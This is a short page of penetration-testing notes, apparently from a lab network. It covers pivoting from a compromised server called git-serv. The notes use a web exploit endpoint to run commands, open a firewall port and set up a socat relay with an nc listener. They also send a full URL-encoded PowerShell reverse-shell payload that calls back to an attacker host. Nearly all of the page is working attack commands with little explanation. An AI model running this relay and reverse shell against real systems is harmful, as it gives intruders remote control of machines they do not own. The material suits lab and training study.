Pivoting

Check if git-servb has connectivity to outside world by pinging ourselves and checking for it via tcpdump

sudo tcpdump -i tun0 icmp

curl -X POST http://10.200.101.150/web/exploit-adot8.php -d "a=ping 10.50.102.164"

Nada

Socat relay

First disable firewalld on centos host

firewall-cmd --zone=public --add-port 8001/tcp

./socat tcp-l:8001 tcp:10.50.102.164:1333 &

nc -lnvp 1333

Next create powershell payload and url encode it using this

curl -X POST http://10.200.101.150/web/exploit-adot8.php -d "a=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.101.200%27%2C8001%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22"

Previous10.200.101.150 [git-serv]NextPost Exploitation

Last updated 2 years ago

hashtagSocat relay

Socat relay